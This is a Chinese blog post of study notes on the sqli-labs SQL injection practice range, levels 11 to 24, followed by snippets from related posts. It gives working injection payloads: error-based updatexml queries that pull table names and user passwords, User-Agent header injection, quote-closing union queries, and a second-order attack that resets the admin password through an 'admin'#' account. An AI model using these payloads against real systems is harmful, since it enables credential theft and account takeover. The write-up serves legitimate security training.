sqli-labs11~24关(练习笔记2)

已于 2024-04-01 20:46:49 修改
阅读量167 收藏 4
点赞数 4
文章标签: 数据库 mybatis mysql
于 2024-04-01 20:46:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63526753/article/details/137245712
版权
本文详细介绍了从基础注入到高级技巧,如报错注入、利用Burpsuite工具、User-Agent注入以及如何通过编码技巧提升用户权限(如将admin#用户密码修改为实际的admin密码)。最后提到在特定靶场遇到的问题。
摘要由CSDN通过智能技术生成

开始的注入方式,前面一篇1~10的部分有讲,所以这里就略过了

11,12————基础注入

13,14————报错注入

15,16————盲注

(注意,在用户和密码界面中输入1是错误的,所以不能用and,而要用or来确保命令正确)

17————报错注入

需要注意:

1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) -- r

//开始出现对于‘users’的报错,需要对其创建一个新的别名“aaa”(很重要)
1' and updatexml(1,concat(0x7e,(select group_concat(password) from (select password from users) as aaa),0x7e),1) -- r  
//完善一下:使其可以看到其他部分的字段
1' and updatexml(1,concat(0x7e,substr(((select group_concat(id,username,password) from (select id,username,password from users) as aaa)),32,1234),0x7e),1) -- r

18————需要用到Burpsuite

在User-Agent行进行注入,注意用1',2,3) -- r 闭合,因为源码中注入点为 

 -- r注释掉后面的'、参数和)。需要在命令中补足。 
完善及结果: 

19,20————与18同理 
21,22————与18同理,但需要进行编码 
23————手动引号闭合

?id=1' or '1=1  
//这样在代码执行时就变成了:id='1' or '1=1',可在or之前进行注入

?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 or '1'='1  
//用database()会报错【不知道为什么】;必须有()包裹

....剩下的就是基础注入的步骤

24——此处并非要像之前一样破除跑数据,而是提升用户权限‘admin’

通过创建“ admin'# ”用户,再修改密码:“ ' ”用于闭合命令语句的单引号,“ # ”用于注释掉后面的语句,使得在修改“ admin'# ”用户密码时,自动转换成修改“ admin ”用户的密码,让我们可以通过admin权限登陆系统。 

这里我的靶场应该是有问题,无法显示登陆后的界面

今天要买zs专辑
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs通笔记(less11-less22)
south_layout的博客
05-06 287
文章目录less-11less-12less-14less-15less-16less-17less-18less-19less-20less-22 less-11 提交账号和密码均为123,执行的sql语句如下。可以用万能密码绕过。注意这里的注释不能用–+ payload:(post方式提交) uname=admin' order by 2#&passwd=123&submi...
九、SQL-labs的第24——二次注入(Post)
qq_73393033的博客
08-03 525
二次注入首先的一点就要在HTTP请求中提交恶意代码,将这个恶意代码存储在数据库中,以便后面使用。在第24,我们是通过注册新账号这种方式,将恶意代码存储到数据库中。假设我们的攻击目标是Dummy。
SQL注入——sqli-labs第二十四_sqli第二十四,零基础学习网络安全编程
m0_61369275的博客
04-06 640
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
SQLI-labs-第二十四
最新发布
weixin_54055099的博客
05-24 372
Sqli-labs第24,二次注入
sqli-labs (less-24)
kukudeshuo的博客
03-12 342
sqli-labs (less-24) 进入24,输入用户名和密码,登入后会显示你的用户名,下面的输入框就是改密码 我在输入用户名和密码的位置试了很多次,发现用户名和密码的位置是没有注入点的 这里我们先点击右下角的 New User click here?,创建一个admin’#的账户,密码为123456 回到主页面后,使用创建的admin’#账户进行登入 在这里更改admin的密码,将123456改为159357 这时我们再回到主页面,发现我们可以使用159357登入admin的账户 这
SQL注入:sqli-labs靶场通(1-37
qq_68163788的博客
02-03 5436
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
基于Sqli-Labs靶场的SQL注入-23~24
Joker
01-04 1256
重点讲二次注入
SQL注入——sqli-labs第二十四
lizhiiiii的博客
02-01 568
这一我们使用二次注入,因为登录页面和注册页面都用了mysql_real_escape_string函数对于特殊字符转义。
SQL注入——sqli-labs第二十四_sqli第二十四,资深网络安全开发带你入门Framework
2401_84103616的博客
04-04 788
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
sqli-labs基础篇 第11~17
Lucky小小吴的小屋
01-23 1389
sqli-labs基础篇 第11~17
sqli-labs11-22心得与思路
m0_48294281的博客
03-28 4002
sqli-labs11-22心得与思路
SQL注入之二次注入(sql-lab24
_Co1a
12-22 1273
什么是二次注入 二次注入可以理解为,攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。防御者可能在用户 输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入。 二次注入原理分为两步 二次注入,可以概括为以下两步: 第一步:插入恶意数据 进行数据库插入数据时,对其中的特殊字符进行了转义处理,在写入数据库的时候又保留了原来的数据。 第二
sqllab第二十四笔记
I_WORM的博客
03-16 350
通过数据库来查看修改密码前和后的变化,发现ren账户的密码发生了改变,原账户密码没有发生任何改变。利用新注册的账户密码进行登录;成功登录进去了,界面是一个修改密码的界面。说明修改了ren账户的密码。查看界面发现是一个登录框,尝试进行登录框的注入发现这里不存在注入点。好了,利用修改后的密码进行登录,发现账户ren'# 登录失败。利用新注册的恶意账户进行登录;成功进入了修改密码的界面。通过点击注册,进入注册面板,注册一个新的账户。利用ren'# 账户修改了ren账户的密码。对该账户进行修改密码的操作。
sqllab第十一笔记
I_WORM的博客
03-14 894
首先看界面是一个登录框;通过admin admin登录进去,发现页面会把用户名和密码的登录信息打印出来;通过bp抓包进行测试是不是存在注入点。
sqli-labs第11-20
永远相信美好的事情即将发生
12-15 3805
Less-11 进入后是个登录页面,应该是基于post的注入,这边准备用hackbar注入,方便一点。看一下源码,两个框的名字分别是uname和passwd 先提交1试试效果 登陆失败,再加一个单引号试试,密码框不输(若是输入密码,报错出来的信息更少;也可同时输入单双引号,这个效果一样) 有报错回显,存在注入,且回显的错误为:‘1’’ and password=’’ LIMIT 0,1。其中1’是我输进去的,另外还有成对的单引号出现,可以看出是字符型。由此猜测sql语句为:select usernam
sqli-labs-----第11
wyzhxhn的博客
11-09 1743
基于错误的POST型单引号字符型注入
sqli-labs-master第24
m_ing
05-17 1214
前言:前面我们遇到了各式各样的sqlmap注入,我们接下来看看有什么牛鬼蛇神 第24 http://192.168.89.139/sqli-labs-master/Less-24/ 看到提示我们“请登录以继续” 我们用正常的admin登录,提示我们可以更改密码。 此例子中我们的步骤是注册一个admin’#的账号,接下来登录该帐号后进行修改密码。此时修改的就是admin的密码。 但是我的脑子一片浆糊,我们在整理下思路 本为二次排序注入 二次排序注入也成为存储型的注入,就是将可能导致sql注入的字符先存
sqli-labs第十一
小人物的博客
06-10 4392
less11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入) 第十一开始进入登录框这种模式,像登陆框这种模式也是可以当成sql语句注入的,你想想啊,它动态的页面,通过post传递值,然后再将post的值写到sql语句中,按照这个想法,那是不是万能注入也能使呢? 试一试。万能注入的语法为“ ‘or ‘1’ = ...
sqllab记录
Anonymous24的博客
07-22 185
sqllab 且视他人之凝目如盏盏鬼火,大胆地去走你的夜路。 搭建sqllabsql文件夹复制到phpstudy下的WWW目录中 打开sqllab文件编辑db-creds.inc,编辑密码为root,并且在phpstudy中修改mysql密码为一致 Less-1 sqllab正常运行 寻找可能的注入点 输入?id=1' 尝试报错 可以看出数据库mysql并且报错内容为'1'' limit 0,1 猜测源原来的数据库语句可能是'select * from xx where.
sqli-labs24
10-07
sqli-labs24是一个SQL注入的卡。在这个卡中,服务器端虽然对用户的直接输入做了一些过滤或者将一些字符进行转义,但是对于已经存入数据库的信息是完全信任的,即不校验数据库信息是否合法。在本卡中,修改代码的部分是通过执行UPDATE语句来修改用户的密码,具体代码如下: UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' 同时,在这个卡中,可以通过使用SQL注入技巧,利用联合查询语句来获取数据库中的信息。例如,可以使用以下注入语句来获取所有用户的id、用户名和密码: ?id=-1' union select 1,(select group_concat(id,'~',username,'~',password) from security.users),'3 以上是sqli-labs24的一些简要说明。如果你在安装或运行过程中遇到任何问题,可以尝试重新解压logged-in.php文件,或者联系我以获取进一步的帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值